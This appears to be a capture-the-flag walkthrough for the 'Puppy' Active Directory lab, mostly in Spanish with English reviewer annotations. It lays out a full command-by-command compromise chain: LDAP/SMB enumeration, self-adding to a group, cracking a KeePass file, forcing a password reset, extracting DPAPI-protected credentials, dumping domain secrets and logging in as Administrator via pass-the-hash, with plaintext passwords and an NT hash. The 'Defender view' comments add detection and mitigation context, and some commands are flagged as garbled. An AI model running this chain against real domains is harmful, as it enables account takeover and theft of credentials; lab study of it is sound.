Puppy

levi.james / KingofAkron2025!
# Phase 1: authenticated enumeration as the low-privileged account levi.james.
# NOTE(review): every authenticated command here passes the password in argv,
# so it lands in shell history and is visible in the process list while it runs.

# Unauthenticated SMB probe: prints host name, domain, OS build and SMB signing state.
nxc smb 10.10.11.70
# DNS enumeration of the puppy.htb zone using the DC as name server (-n);
# -a also attempts a zone transfer.
dnsrecon -a -n 10.10.11.70 -d puppy.htb
# Dumps users, groups, computers and policy over LDAP into report files in the
# current directory.
ldapdomaindump -u 'puppy.htb\levi.james' -p 'KingofAkron2025!' 10.10.11.70
# Lists the SMB shares and the access this account has to each.
netexec smb 10.10.11.70 -u 'levi.james' -p 'KingofAkron2025!' -d puppy.htb --shares
# Builds users.txt: enumdomusers prints `user:[name] rid:[0x..]`, tr turns both
# brackets into spaces, and awk keeps the second field (the account name).
rpcclient -U 'levi.james%KingofAkron2025!' 10.10.11.70 -c "enumdomusers" | tr '[]' ' '| awk '{print $2}' > users.txt
# AS-REP check: only accounts with Kerberos pre-authentication disabled return
# crackable material. No output is recorded on this page, so the result is unknown.
impacket-GetNPUsers puppy.htb/ -no-pass -usersfile users.txt
# Kerberoast check: requests service tickets for accounts that carry an SPN.
# No output is recorded here either.
# Defender view: both requests are logged on the DC (events 4768 / 4769);
# keeping pre-auth required and giving service accounts long random passwords
# removes the crackable material.
impacket-GetUserSPNs puppy.htb/levi.james:'KingofAkron2025!'  -request

Nos añadimos al grupo DEVELOPERS

# levi.james adds itself to DEVELOPERS. This only succeeds if that account has
# write access to the group's membership; the ACL itself is not shown on this page.
# Defender view: the change is logged on the DC as a group-membership event
# (4728 / 4732 / 4756 depending on group scope); self-service group writes like
# this are worth auditing in the directory ACLs.
# NOTE(review): -d receives the DC's FQDN here, while the later bloodyAD call
# uses `--host DC.puppy.htb -d puppy.htb`; host and domain look swapped — confirm.
bloodyAD --host 10.10.11.70 -d DC.puppy.htb -u levi.james -p 'KingofAkron2025!'  add groupMember 'DEVELOPERS' 'levi.james'
# Opens the DEV share; presumably readable only after the group change, and
# presumably where recovery.kdbx comes from — confirm, the transfer is not recorded.
smbclient //10.10.11.70/DEV -U 'levi.james'%'KingofAkron2025!'  
# Extracts the KeePass database's key-derivation data into john's hash format.
/opt/john/run/keepass2john recovery.kdbx > hash.txt
# Dictionary run against the extracted hash with the rockyou list.
# NOTE(review): this reads hash_fixed.txt, but the step above wrote hash.txt;
# whatever edit produced hash_fixed.txt is not recorded in these notes.
# Defender view: a master password that appears in a public wordlist gives the
# database no real protection once the .kdbx file is readable on a share.
sudo /opt/john/run/john hash_fixed.txt --wordlist=/usr/share/wordlists/rockyou.txt
liverpool  (contraseña de recovery.kdbx obtenida con john)
ant.edwards : Antman2025!
# Interactive rpcclient session as ant.edwards.
rpcclient -U 'ant.edwards%Antman2025!' 10.10.11.70
# Typed at the rpcclient prompt, not in the shell: info level 23 sets a new
# password on adam.silver without knowing the old one. It works only if
# ant.edwards holds password-reset rights over that account (ACL not shown here).
# Defender view: logged on the DC as event 4724 (password reset attempt).
setuserinfo2 adam.silver 23 'Pa$$w0rd123'
# Verifies the new password; the single quotes keep `$$` literal in the shell.
# The recorded output below shows the password is accepted but the account is disabled.
netexec smb 10.10.11.70 -u 'adam.silver' -p 'Pa$$w0rd123' -d puppy.htb
SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.10.11.70     445    DC               [-] puppy.htb\adam.silver:Pa$$w0rd123 STATUS_ACCOUNT_DISABLED

Para habilitar la cuenta

# Clears the ACCOUNTDISABLE bit in adam.silver's userAccountControl, which
# re-enables the account. Requires write access to that attribute for ant.edwards.
# Defender view: logged as event 4722 (account enabled); a disabled account
# that is reset and re-enabled by a non-admin within minutes is a strong signal.
bloodyAD --host DC.puppy.htb -d puppy.htb -u ant.edwards -p 'Antman2025!' remove uac 'adam.silver' -f ACCOUNTDISABLE
# WinRM session as adam.silver; this presumes the account is allowed remote
# management logon (group membership is not shown on this page).
evil-winrm -i 10.10.11.70 -u adam.silver -p 'Pa$$w0rd123'
# Typed at the evil-winrm prompt: pulls the backup archive to the local machine.
# NOTE(review): the directory it was found in is not recorded. The steph.cooper
# credentials noted next presumably come from this archive — confirm.
download site-backup-2024-12-30.zip
steph.cooper : ChefSteph2025!
# Generic DPAPI template (USER, PASS and SID are placeholders); the concrete
# run for steph.cooper follows further down.

# Local SMB server for file transfer.
# NOTE(review): the concrete run below moves files via base64 + download
# instead, so this share appears unused — confirm.
impacket-smbserver share ./share -smb2support
# Credential Manager blobs live here (hidden/system files).
cd C:\users\USER\appdata\roaming\microsoft\credentials
download C4BB96844A5C9DD45D5B6A9859252BA6
# DPAPI master keys live under Protect\<SID>\<GUID>.
cd C:\Users\USER\AppData\Roaming\Microsoft\Protect

# Decrypts a master key file with the user's password and SID.
# NOTE(review): -file is given the credential blob name here; the concrete run
# below passes the master key file from Protect\<SID>\ instead, so this looks
# like a copy/paste slip — confirm.
impacket-dpapi masterkey -file C4BB96844A5C9DD45D5B6A9859252BA6 -password 'PASS' -sid SID

# Decrypts the credential blob with the recovered master key.
# NOTE(review): this key is identical to the one in the steph.cooper run below,
# so it appears to have been pasted back into the template.
impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
# Concrete DPAPI run for steph.cooper. The `$path` / `[Convert]` / `download`
# lines are typed in the evil-winrm (PowerShell) session; `base64` and
# `impacket-dpapi` run on the local machine.
# Defender view: the master key is protected only by the user's password, so
# anyone holding that password plus these two files can decrypt offline.
# Privileged credentials saved in a standard user's Credential Manager are the
# weakness here. The out.txt files written to the user's Temp directory are
# left behind as a forensic artifact.

# Step 1: the user's DPAPI master key file (Protect\<SID>\<GUID>).
$path = "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"
# NOTE(review): this line is garbled as recorded; `ToBase64StringReadAllBytes`
# is not a .NET method. Presumably it was
# [Convert]::ToBase64String([IO.File]::ReadAllBytes($path)) — confirm.
[Convert]::ToBase64StringReadAllBytes($path) | Out-File -Encoding ASCII 'C:\Users\steph.cooper\AppData\Local\Temp\out.txt'
download 'C:\Users\steph.cooper\AppData\Local\Temp\out.txt'
# Back to raw bytes on the local side.
base64 -d out.txt > masterkey.blob

# Decrypts the master key with steph.cooper's password and SID; the resulting
# key is the -key value used below.
impacket-dpapi masterkey -file masterkey.blob -password 'ChefSteph2025!' -sid S-1-5-21-1487982659-1829050783-2281216199-1107

# Step 2: the Credential Manager blob, transferred the same way.
# out.txt is overwritten, both remotely and locally.
$path = "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9"
# NOTE(review): same garbled call as in step 1.
[Convert]::ToBase64StringReadAllBytes($path) | Out-File -Encoding ASCII 'C:\Users\steph.cooper\AppData\Local\Temp\out.txt'
download 'C:\Users\steph.cooper\AppData\Local\Temp\out.txt'
base64 -d out.txt > credential.blob

# Decrypts the stored credential with the master key from step 1. The output
# is not recorded; presumably it yields the steph.cooper_adm password used in
# the next command — confirm.
impacket-dpapi credential -file credential.blob -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
# Dumps credential material from the DC using the steph.cooper_adm account;
# this needs administrative / replication rights for that account.
# Defender view: directory replication requested by a host that is not a DC is
# the usual detection point (event 4662 on replication rights). After a dump
# like this, every extracted secret has to be treated as exposed, so rotating
# only steph.cooper_adm is not sufficient (krbtgt is normally rotated twice).
impacket-secretsdump puppy.htb/steph.cooper_adm:'FivethChipOnItsWay2025!'@10.10.11.70
# WinRM logon with the Administrator NT hash (-H) instead of a password; the
# hash presumably comes from the dump above, whose output is not recorded.
evil-winrm -i 10.10.11.70 -u 'Administrator' -H 'bb0edc15e49ceb4120c7bd7e6e65d75b'